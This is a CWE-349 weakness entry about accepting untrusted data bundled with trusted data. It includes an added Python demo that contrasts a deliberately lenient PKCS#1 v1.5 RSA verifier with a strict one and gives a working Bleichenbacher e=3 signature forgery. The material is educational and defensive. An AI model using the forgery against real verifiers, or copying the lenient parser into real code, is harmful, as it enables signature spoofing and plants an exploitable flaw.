CWE-349: Acceptance of Extraneous Untrusted Data With Trusted Data
CWE Version: 4.18
Last Updated: 2025-09-09
Weakness Description
The product, when processing trusted data, accepts any untrusted data that is also included with the trusted data, treating the untrusted data as if it were trusted.
Common Consequences
Scope: Access Control; Integrity
Technical Impact: Bypass Protection Mechanism; Modify Application Data
Note: An attacker could package untrusted data with trusted data to bypass protection mechanisms and gain access to, and possibly modify, sensitive data.
Observed Examples
Reference: CVE-2002-0018
Does not verify that the trusted entity is authoritative for all entities in its response.
Reference: CVE-2006-5462
Use of extra data in a signature allows certificate signature forging.
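The second observed example is the signature form of this weakness: the verifier finds the expected digest inside a decoded signature block and treats the remaining bytes of that block as if the signer had vouched for them. The following is an added example, not code from the CWE entry or from the product behind that CVE. It models a lenient PKCS#1 v1.5 verifier beside a strict one and uses Bleichenbacher's 2006 cube-root forgery against a small public exponent (e = 3) to show why the trailing bytes matter: the forger needs no private key, only room in the block for garbage. The RSA key (generated in-process from a fixed seed), the message, and all function names are constructed for this demonstration.

```python
# Added example, not code from the CWE entry or from any product it references.
# A lenient PKCS#1 v1.5 verifier that parses the decoded block and ignores what
# follows the DigestInfo (the CWE-349 flaw) next to a strict verifier that
# compares the whole block. With e = 3 the lenient parser falls to
# Bleichenbacher's cube-root forgery. Keys, messages and names are constructed.
import hashlib
import random

E = 3                       # small public exponent, as the forgery requires
MOD_BITS = 2048
MOD_BYTES = MOD_BITS // 8
# DER-encoded DigestInfo prefix for SHA-256 (RFC 8017, section 9.2, note 1)
SHA256_DIGESTINFO_PREFIX = bytes.fromhex("3031300d060960864801650304020105000420")
SMALL_PRIMES = [p for p in range(3, 2000, 2)
                if all(p % q for q in range(3, int(p ** 0.5) + 1, 2))]


def is_probable_prime(n: int, rng: random.Random, rounds: int = 24) -> bool:
    """Miller-Rabin, demo quality only (not a production prime test)."""
    if n < 2 or n % 2 == 0:
        return n == 2
    for p in SMALL_PRIMES:
        if n % p == 0:
            return n == p
    d, s = n - 1, 0
    while d % 2 == 0:
        d //= 2
        s += 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def generate_keypair(seed: int = 349):
    """Constructed RSA key with e = 3; both primes are 2 mod 3 so 3 is invertible mod phi."""
    rng = random.Random(seed)          # seeded so the demo key is reproducible

    def prime(bits: int) -> int:
        while True:
            c = rng.getrandbits(bits) | (1 << (bits - 1)) | 1
            if c % 3 == 2 and is_probable_prime(c, rng):
                return c

    p, q = prime(MOD_BITS // 2), prime(MOD_BITS // 2)
    return p * q, pow(E, -1, (p - 1) * (q - 1))   # (n, d)


def emsa_pkcs1_v1_5_encode(message: bytes) -> bytes:
    """EM = 00 01 || FF..FF || 00 || DigestInfo, exactly MOD_BYTES long (RFC 8017, 9.2)."""
    t = SHA256_DIGESTINFO_PREFIX + hashlib.sha256(message).digest()
    return b"\x00\x01" + b"\xff" * (MOD_BYTES - len(t) - 3) + b"\x00" + t


def sign(n: int, d: int, message: bytes) -> int:
    return pow(int.from_bytes(emsa_pkcs1_v1_5_encode(message), "big"), d, n)


def verify_strict(n: int, sig: int, message: bytes) -> bool:
    """Rebuild the expected block and compare every byte; no room for extra data."""
    em = pow(sig, E, n).to_bytes(MOD_BYTES, "big")
    return em == emsa_pkcs1_v1_5_encode(message)


def verify_lenient(n: int, sig: int, message: bytes) -> bool:
    """Vulnerable (CWE-349): walks the block, finds the DigestInfo, never looks at what follows."""
    em = pow(sig, E, n).to_bytes(MOD_BYTES, "big")
    if em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < MOD_BYTES and em[i] == 0xFF:
        i += 1
    if i >= MOD_BYTES or em[i] != 0x00:
        return False
    t = SHA256_DIGESTINFO_PREFIX + hashlib.sha256(message).digest()
    return em[i + 1:i + 1 + len(t)] == t   # em[i + 1 + len(t):] is accepted unchecked


def icbrt_ceil(x: int) -> int:
    """Smallest integer r with r**3 >= x (binary search, x > 0)."""
    lo, hi = 0, 1 << (x.bit_length() // 3 + 2)
    while lo < hi:
        mid = (lo + hi) // 2
        if mid ** 3 < x:
            lo = mid + 1
        else:
            hi = mid
    return lo


def forge_signature(message: bytes) -> int:
    """Bleichenbacher's e=3 forgery: s with s**3 = 00 01 FF*8 00 DigestInfo || garbage."""
    t = SHA256_DIGESTINFO_PREFIX + hashlib.sha256(message).digest()
    prefix = b"\x00\x01" + b"\xff" * 8 + b"\x00" + t
    garbage_bits = (MOD_BYTES - len(prefix)) * 8
    prefix_int = int.from_bytes(prefix, "big")
    s = icbrt_ceil(prefix_int << garbage_bits)
    # s**3 overshoots the target by less than 3*s**2 + 3*s + 1 (about 2**1357 here),
    # which fits inside the 1552 garbage bits, so the prefix survives. s**3 is also
    # below 2**2033 < n, so the public operation never reduces modulo n.
    if (s ** 3) >> garbage_bits != prefix_int:
        raise ValueError("forgery failed: not enough room for garbage")
    return s


if __name__ == "__main__":
    n, d = generate_keypair()
    msg = b"CN=victim.example, issuer=Constructed Demo CA"   # constructed message
    genuine, forged = sign(n, d, msg), forge_signature(msg)
    print("strict  genuine/forged:", verify_strict(n, genuine, msg), verify_strict(n, forged, msg))
    print("lenient genuine/forged:", verify_lenient(n, genuine, msg), verify_lenient(n, forged, msg))
```

The forgery works because the lenient parser accepts the 51-byte DigestInfo and then stops, so the attacker gets the remaining 194 bytes of the block as free variables; a cube root only has to get the first 62 bytes right. The strict check in verify_strict is the fix a practitioner wants: reconstruct the full encoding and compare it in one shot, which leaves no extraneous bytes to be treated as trusted.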
Modes of Introduction
| Phase | Note |
|---|---|
| Implementation | - |
Applicable Platforms
Languages
Taxonomy Mappings
| Taxonomy Name | Entry ID | Entry Name | Mapping Fit |
|---|---|---|---|
| PLOVER | - | Untrusted Data Appended with Trusted Data | - |
| The CERT Oracle Secure Coding Standard for Java (2011) | ENV01-J | Place all security-sensitive code in a single JAR and sign and seal it | - |